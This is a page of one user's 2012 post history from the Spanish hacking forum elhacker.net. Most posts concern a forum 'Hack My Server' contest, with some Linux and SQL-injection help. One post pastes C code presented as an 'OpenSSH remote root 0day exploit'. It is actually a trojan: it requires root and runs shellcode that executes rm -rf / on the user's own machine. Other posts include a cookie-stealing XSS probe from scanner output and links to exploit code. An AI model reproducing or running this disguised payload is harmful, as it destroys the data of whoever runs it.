elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Mensajes
Páginas: 1 ... 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 [27] 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 ... 49
261  Seguridad Informática / Hacking / Re: Inseguridad de Linux por partición con Windows. en: 10 Mayo 2012, 18:38 pm
pues si se puede, hace unos años cuando aprendia a utilizar linux, necesitaba pasar mis archivos de una lado a otro el problema era hacerlo de windows a linux

no recuerdo el nombre del programa pero era escrito en JAVA, y podia revisar mis archivos de linux e incluso intercambiar archivos, por eso menciono que si es posible, pero bueno tendras que instalar java para que funcione el virus m imagino que se podria hacer con lenguaje C pero otro problema es que seria muy pesado como para ser un virus indetectable
262  Seguridad Informática / Bugs y Exploits / Re: Aprendiendo SQL Injection ... ayuda please? ^-^ en: 10 Mayo 2012, 01:34 am
desafortunadamente no se si habra ejemplos aqui con joomla y SQLi, pero si apenas estas aprendiendo puedes seguir estos tutoriales y hacer pruebas con joomla despues para ver si te funciona

http://foro.elhacker.net/hacking_avanzado/gran_tutorial_sobre_inyecciones_sql_en_mysql-t247535.0.html

http://foro.elhacker.net/bugs_y_exploits/sql_injection_para_principiantes_ejemplos_en_aplicaciones_reales-t142203.0.html
263  Seguridad Informática / Bugs y Exploits / Re: Aprendiendo SQL Injection ... ayuda please? ^-^ en: 9 Mayo 2012, 23:53 pm
hola sasha

 si lo que buscas es sobre seguridad web, entra en esta zona, hay tutoriales, ejemplos y temas sobre hackweb, tambien en la pagina principal www.elhacker.net hay ejemplos sobre SQLi, XSS, RFI, etc

http://foro.elhacker.net/nivel_web-b83.0/

tambien seria bueno que postearas las cosas que no vayas entendiendo en tus intentos para lograr orientarte sobre que podrias hacer, de esa manera no lo tendras facil pero tampoco te enojaras por no lograr avanzar

suerte y salu2
264  Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server" en: 9 Mayo 2012, 23:33 pm
en el pagina 13 puse una XSS que encontre en un escaneo, pero no se si no supe utilizarla o no funciona, la hice con wapiti un scanner GPL, este fue el resultado

Código:
http://xx.xxx.xxx.180/?mod=<script>alert(document.cookie)</script>&op=browse
Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
Referencias:
  http://www.cert.org/advisories/CA-2000-02.html

luego hice un scaneo con nikto y me dio el mismo resultado

Código:
+ /?mod=<script>alert(document.cookie)</script>&op=browse - 200/OK Response could be Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.

por cierto dimitrix, me podrias mandar los datos de plesk porfavor
265  Sistemas Operativos / GNU/Linux / Re: Debian me odia. en: 9 Mayo 2012, 04:46 am
talvez el problema es el debian que utiliza, recuerda que la version estable es antigua y por lo mismo es segura, solo quedan las cosas que ya fueron arregladas

intenta con debian mas reciente, intenta con wheeze

lo que no pusise es si te deja llegar hasta root o se detiene mientras se carga

si puedes usar tty, oprime todas las opciones son de f1 a f7, a ver i alguno te deja ver comandos

si puedes ver los comandos busca la informacion de video, y verificala con la de tu cdlive y ve si hay diferencias, talvez hay modificaciones que no hayas visto

a ver si esto te ayuda
266  Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server" en: 8 Mayo 2012, 21:56 pm
haciendo un escaneo me encontre con esto pero creo tampoco funciona  :-\

o a lo mejor es local

http://xx.xxx.xxx.180/?mod=<script>alert(document.cookie)</script>&op=browse
Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.


P.D. dimitrix me mandas los datos de plesk porfavor
267  Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server" en: 8 Mayo 2012, 20:44 pm
pues estuve probando un buen de cosas, metasploit, varios exploit, entre ellos varios que aquii utilizaron... lo bueno es que ya hubo  quien lo intento con los que poste hace tiempo y pues al parecer tampoco funcionaron e incluso e estado leyendo los bugs de esta paina para encontrar algo pero la mayoria son locales

http://xss.cx/examples/plesk-reports/xss-reflected-cross-site-scripting-cwe79-capec86-plesk-parallels-control-panel-version-20110407.20.html

tambien vi un explot para debian, OpenSSH 5.3p1 Debian
 intente con este

Código:
* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
*
*/
 
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
 
void usage(char *argv[])
{
    printf("\n\t[+] HATSUNEMIKU\n");
    printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
    printf("\t[+] By: n3xus\n");
    printf("\t[+] Greetz to hackforums.net\n");
    printf("\t[+] Keep this 0day priv8!\n");
    printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
    exit(1);
}
 
unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
                           "\x6a\x2f\x89\xe7\x52"
                           "\x66\x68\x2d\x66\x89"
                           "\xe6\x52\x66\x68\x2d"
                           "\x72\x89\xe1\x52\x68"
                           "\x2f\x2f\x72\x6d\x68"
                           "\x2f\x62\x69\x6e\x89"
                           "\xe3\x52\x57\x56\x51"
                           "\x53\x89\xe1\xcd\x80";
 
unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                           "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
                           "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
                           "\xdb\x40\xcd\x80";
 
int main(int argc, char **argv)
{
 
    int euid = geteuid();
    int port= 22, sock;
    char h[1000];
    struct hostent *host;
    struct sockaddr_in addr;
 
    if(euid != 0)
    {
        fprintf(stderr, "You need to be root to use raw sockets.\n");
        exit(1);
    }
    if(euid == 0)
    {
        fprintf(stdout, "MIKU! MIKU! MIKU!\n");
    }
    if(argc != 3)
    usage(argv);
    if(!inet_aton(h, &addr.sin_addr))
    {
        host = gethostbyname(h);
        if(!host)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            (*(void(*)())decoder)();
            exit(1);
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
        }
        sock = socket(PF_INET, SOCK_STREAM, 0);
        addr.sin_port = htons(port);
        addr.sin_family = AF_INET;
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr,"[-] Exploit failed.\n");
            exit(1);
        }
        char payload[1337];
        memcpy(payload, &decoder, sizeof(decoder));
        memcpy(payload, &rootshell, sizeof(rootshell));
        send(sock, payload, strlen(payload),0);
        close(sock);
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            exit(1);
        }
        else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
        {
            fprintf(stdout, "[+]g0t sh3ll!\n");
            system("/bin/bash");
        }
        else
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            close(sock);
            exit(0);
        }
}

pero tampoco, espero pronto haya mas suerte

268  Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server" en: 3 Mayo 2012, 04:58 am
al parecer plesk tiene un fallo en Agent.php, pero lamentablemente casi no se mucho sobre SQLi, tratare de buscar como lograrlo, ya que ayer fue lo primero que encontre sobre subir privilegios... pero por lo mismo que no se mucho sobre eso, lo quise dejar para despues e intentar con exploits, pero lo hare a ver que puedo encontrar

salu2
269  Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server" en: 3 Mayo 2012, 04:53 am
que mala suerte, bueno pues mañana lo intentare de nuevo, tampoco pude con ProFTPD, metasploit no pudo

estos son los exploits con los que intente

http://securityvulns.ru/files/sm00ny-courier_imap_fsx.c

http://old.honeynet.org/papers/enemy/imapd_exploit.txt

salu2
270  Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server" en: 3 Mayo 2012, 02:49 am
hola

pues yo estoy intentando con IMAP, al rato posteo lo que encontre aunque no creo que me funcione para tener acceso... por cierto

dimitrix, podrias verificar la direccion /etc/passwd si hubo algun cambio o algo, es que no se si logre agregar algo o solo fue un error en un exploit

tambien al rato posteo ese exploit, salu2
Páginas: 1 ... 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 [27] 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 ... 49
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines